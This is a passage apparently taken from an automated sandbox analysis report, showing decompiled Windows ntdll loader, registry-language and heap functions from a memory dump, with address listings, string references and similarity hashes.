                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01179C18
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 2994545307-1948996284
                                                      • Opcode ID: b2d9d45a4f9b9ec1c8964a47b48d0391fbc0da4aee3ec860dd38e7fdae58df3f
                                                      • Instruction ID: 66ab2d262e5fc4359e2a6185a91f082f5e63b524506526e52036138d3ab67407
                                                      • Opcode Fuzzy Hash: b2d9d45a4f9b9ec1c8964a47b48d0391fbc0da4aee3ec860dd38e7fdae58df3f
                                                      • Instruction Fuzzy Hash: A3915631A0022ADFEF1CDF58D880ABA77F5FF94318B054169EA01AB241E770ED21CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01127E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E01127E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0112CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0111C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1205780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01195510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1205780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01137D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01137D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01197016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01137D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01137D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01197016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0114A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0111B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                      0x01127e4c
                                                      0x01127e50
                                                      0x01127e55
                                                      0x01127e58
                                                      0x01127e5d
                                                      0x01127e71
                                                      0x01127f33
                                                      0x01127e77
                                                      0x01127e77
                                                      0x01127e79
                                                      0x01127e79
                                                      0x01127e7e
                                                      0x01127f45
                                                      0x01179848
                                                      0x00000000
                                                      0x01179848
                                                      0x01127f4e
                                                      0x01127f53
                                                      0x01127f5a
                                                      0x00000000
                                                      0x00000000
                                                      0x0117985a
                                                      0x01179862
                                                      0x01179866
                                                      0x00000000
                                                      0x0117986c
                                                      0x00000000
                                                      0x0117986c
                                                      0x01127e84
                                                      0x01127e84
                                                      0x01127e8d
                                                      0x01179871
                                                      0x01127eb8
                                                      0x01127ec0
                                                      0x01127ec0
                                                      0x01127e9a
                                                      0x0117987e
                                                      0x00000000
                                                      0x00000000
                                                      0x01179884
                                                      0x0117988b
                                                      0x011798a7
                                                      0x011798ac
                                                      0x011798b1
                                                      0x011798b6
                                                      0x011798b8
                                                      0x011798b8
                                                      0x011798b9
                                                      0x00000000
                                                      0x011798b9
                                                      0x01127ea0
                                                      0x01127ea7
                                                      0x00000000
                                                      0x00000000
                                                      0x01127eac
                                                      0x01127eb1
                                                      0x01127ec6
                                                      0x01127ed0
                                                      0x011798cc
                                                      0x01127ed6
                                                      0x01127ed6
                                                      0x01127ed6
                                                      0x01127ede
                                                      0x01127ee3
                                                      0x011798e3
                                                      0x011798f0
                                                      0x01179902
                                                      0x011798f2
                                                      0x011798fb
                                                      0x011798fb
                                                      0x01179907
                                                      0x0117991d
                                                      0x0117991d
                                                      0x01179907
                                                      0x011798e3
                                                      0x01127ef0
                                                      0x01127f14
                                                      0x01127f14
                                                      0x01127f1e
                                                      0x01179946
                                                      0x01127f24
                                                      0x01127f24
                                                      0x01127f24
                                                      0x01127f2c
                                                      0x0117996a
                                                      0x01179975
                                                      0x01179975
                                                      0x0117997e
                                                      0x01179993
                                                      0x01179993
                                                      0x0117997e
                                                      0x00000000
                                                      0x01127ef2
                                                      0x01127efc
                                                      0x01127f0a
                                                      0x01127f0e
                                                      0x01179933
                                                      0x00000000
                                                      0x01179933
                                                      0x00000000
                                                      0x01127f0e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01127eb1

                                                      Strings
                                                      • LdrpCompleteMapModule, xrefs: 01179898
                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 01179891
                                                      • minkernel\ntdll\ldrmap.c, xrefs: 011798A2
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                      • API String ID: 0-1676968949
                                                      • Opcode ID: 71c0a73879f7c2855a60783f76f51fa384aecf97db522a53c623364acd9cc30d
                                                      • Instruction ID: 76e2e0e3725cb77ef740d060a1cd63be62cf1cb6a60d0ffd492db3a08f538478
                                                      • Opcode Fuzzy Hash: 71c0a73879f7c2855a60783f76f51fa384aecf97db522a53c623364acd9cc30d
                                                      • Instruction Fuzzy Hash: A751F13160476ADBEB2ECB5CC844B6A7BA4BF10328F050599E9619B7E1E730E910CB61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0111E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 93%
                                                      			E0111E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0111F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E011595D0();
						}
						if(_t78 != 0) {
							L011377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0115FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0115BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01159600();
					if(_t97 < 0) {
						goto L6;
					}
					E0115BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0111F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0115BB40(_t83, _t102 + 0x24, _t78);
								if(L011243C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0115BB40(_t84, _t102 + 0x24, _t94);
									if(L011243C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                      0x0111e620
                                                      0x0111e628
                                                      0x0111e62f
                                                      0x0111e631
                                                      0x0111e635
                                                      0x0111e637
                                                      0x0111e63e
                                                      0x01175503
                                                      0x01175503
                                                      0x0111e64c
                                                      0x0111e64c
                                                      0x0111e651
                                                      0x00000000
                                                      0x00000000
                                                      0x0111e661
                                                      0x0111e665
                                                      0x0117542a
                                                      0x0111e715
                                                      0x0111e71a
                                                      0x0111e71c
                                                      0x0111e720
                                                      0x0111e720
                                                      0x0111e727
                                                      0x0111e736
                                                      0x0111e736
                                                      0x0111e743
                                                      0x0111e743
                                                      0x0111e673
                                                      0x0111e678
                                                      0x0111e67d
                                                      0x0111e682
                                                      0x0111e685
                                                      0x0111e692
                                                      0x0111e69b
                                                      0x0111e6a3
                                                      0x0111e6ad
                                                      0x0111e6b1
                                                      0x0111e6b2
                                                      0x0111e6bb
                                                      0x0111e6bf
                                                      0x0111e6c0
                                                      0x0111e6c8
                                                      0x0111e6cc
                                                      0x0111e6d5
                                                      0x0111e6d9
                                                      0x00000000
                                                      0x00000000
                                                      0x0111e6e5
                                                      0x0111e6ea
                                                      0x0111e6f9
                                                      0x0111e70b
                                                      0x0111e70f
                                                      0x01175439
                                                      0x0117545e
                                                      0x0117545e
                                                      0x00000000
                                                      0x0117545e
                                                      0x0117543b
                                                      0x0117543e
                                                      0x01175440
                                                      0x01175445
                                                      0x01175472
                                                      0x01175475
                                                      0x0117548d
                                                      0x01175493
                                                      0x011754a9
                                                      0x00000000
                                                      0x00000000
                                                      0x011754ab
                                                      0x011754b4
                                                      0x011754bc
                                                      0x011754c8
                                                      0x011754de
                                                      0x011754fb
                                                      0x011754e0
                                                      0x011754e6
                                                      0x011754eb
                                                      0x011754eb
                                                      0x011754de
                                                      0x00000000
                                                      0x011754bc
                                                      0x01175477
                                                      0x0117547a
                                                      0x01175480
                                                      0x01175483
                                                      0x01175486
                                                      0x0117548b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0117548b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01175447
                                                      0x01175447
                                                      0x01175447
                                                      0x01175447
                                                      0x0117544e
                                                      0x00000000
                                                      0x00000000
                                                      0x01175450
                                                      0x01175452
                                                      0x01175455
                                                      0x0117545a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0117545c
                                                      0x0117546a
                                                      0x0117546d
                                                      0x0117546f
                                                      0x00000000
                                                      0x0117546f
                                                      0x0111e70f

                                                      Strings
                                                      • @, xrefs: 0111E6C0
                                                      • InstallLanguageFallback, xrefs: 0111E6DB
                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0111E68C
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                      • API String ID: 0-1757540487
                                                      • Opcode ID: 1eea9b5708da2e7f85521cef50e5586abc97d3ed84215479008775f9a50a2030
                                                      • Instruction ID: 968fa5455a445d0f512e4d87a4b86fa5177e00eeb3cd0f5ec91409ce10b8fc03
                                                      • Opcode Fuzzy Hash: 1eea9b5708da2e7f85521cef50e5586abc97d3ed84215479008775f9a50a2030
                                                      • Instruction Fuzzy Hash: 1451B1726093469BD759DF68C440A6BB7FABF88618F05092EF986D7340FB34D904C7A2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011DE539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 60%
                                                      			E011DE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E011DBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E011DBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E011DAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01159730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E011DA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E011DA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01159730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E011DA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E011DA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01132280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0112B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0112FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01137D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E011CFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                      0x011de547
                                                      0x011de549
                                                      0x011de54f
                                                      0x011de553
                                                      0x011de557
                                                      0x011de55a
                                                      0x011de55c
                                                      0x011de55f
                                                      0x011de561
                                                      0x011de567
                                                      0x011de56b
                                                      0x011de7e2
                                                      0x00000000
                                                      0x011de571
                                                      0x011de575
                                                      0x011de577
                                                      0x011de57b
                                                      0x011de57c
                                                      0x011de57d
                                                      0x011de57e
                                                      0x011de57f
                                                      0x011de588
                                                      0x011de58f
                                                      0x011de591
                                                      0x011de592
                                                      0x011de592
                                                      0x011de596
                                                      0x011de59e
                                                      0x011de5a0
                                                      0x011de5a6
                                                      0x011de61d
                                                      0x011de61d
                                                      0x011de621
                                                      0x011de623
                                                      0x011de630
                                                      0x011de630
                                                      0x011de7e6
                                                      0x011de7eb
                                                      0x011de7ed
                                                      0x011de7f4
                                                      0x011de7fa
                                                      0x011de7ff
                                                      0x011de7ff
                                                      0x011de80a
                                                      0x011de812
                                                      0x011de812
                                                      0x011de5ab
                                                      0x011de5b4
                                                      0x011de5b9
                                                      0x011de5be
                                                      0x011de5c0
                                                      0x011de5c2
                                                      0x011de5c8
                                                      0x011de5c9
                                                      0x011de5cb
                                                      0x011de5cc
                                                      0x011de5d5
                                                      0x011de5e4
                                                      0x011de5f1
                                                      0x011de5f8
                                                      0x011de5f8
                                                      0x011de5d5
                                                      0x011de602
                                                      0x011de616
                                                      0x011de63d
                                                      0x011de644
                                                      0x011de64d
                                                      0x011de652
                                                      0x011de657
                                                      0x011de659
                                                      0x011de65b
                                                      0x011de661
                                                      0x011de662
                                                      0x011de664
                                                      0x011de665
                                                      0x011de66e
                                                      0x011de67d
                                                      0x011de68a
                                                      0x011de691
                                                      0x011de691
                                                      0x011de66e
                                                      0x011de6b0
                                                      0x00000000
                                                      0x011de6b6
                                                      0x011de6bd
                                                      0x011de6c7
                                                      0x011de6d7
                                                      0x011de6d9
                                                      0x011de6db
                                                      0x011de6de
                                                      0x011de6e3
                                                      0x011de6f3
                                                      0x011de6fc
                                                      0x011de700
                                                      0x011de700
                                                      0x011de704
                                                      0x011de70a
                                                      0x011de70a
                                                      0x011de713
                                                      0x011de716
                                                      0x011de719
                                                      0x011de720
                                                      0x011de761
                                                      0x011de76b
                                                      0x011de774
                                                      0x011de77a
                                                      0x011de77a
                                                      0x011de78a
                                                      0x011de791
                                                      0x011de799
                                                      0x011de79b
                                                      0x011de79f
                                                      0x011de7aa
                                                      0x011de7c0
                                                      0x011de7ac
                                                      0x011de7b2
                                                      0x011de7b9
                                                      0x011de7b9
                                                      0x011de7c7
                                                      0x011de806
                                                      0x00000000
                                                      0x011de7c9
                                                      0x011de7d1
                                                      0x011de7d8
                                                      0x00000000
                                                      0x011de7d8
                                                      0x00000000
                                                      0x00000000
                                                      0x011de722
                                                      0x011de72e
                                                      0x011de748
                                                      0x011de74c
                                                      0x011de754
                                                      0x011de756
                                                      0x011de75c
                                                      0x011de75c
                                                      0x00000000
                                                      0x011de75c
                                                      0x011de758
                                                      0x011de758
                                                      0x00000000
                                                      0x011de758
                                                      0x011de750
                                                      0x00000000
                                                      0x00000000
                                                      0x011de752
                                                      0x00000000
                                                      0x011de752
                                                      0x011de730
                                                      0x011de735
                                                      0x011de73d
                                                      0x011de73f
                                                      0x00000000
                                                      0x00000000
                                                      0x011de741
                                                      0x011de741
                                                      0x00000000
                                                      0x011de741
                                                      0x011de739
                                                      0x00000000
                                                      0x00000000
                                                      0x011de73b
                                                      0x00000000
                                                      0x011de73b
                                                      0x011de722
                                                      0x011de720
                                                      0x011de6b0
                                                      0x011de618
                                                      0x00000000
                                                      0x011de618

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction ID: 33d9e513aeb625fe8bdad0c28ab2415d6c8faf1009fa8f6ccef01e38d8ae1ed6
                                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction Fuzzy Hash: 4791C2312057429FE768CF29C841B5BBBE5BF84715F15892DFA99CB280E774E804CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011951BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E011951BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x11f05f0);
				E0116D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0112EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E011953CA(0);
						return E0116D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0115F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01133690(1, _t117, 0x10f1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0115AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01134620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0115AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0119500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
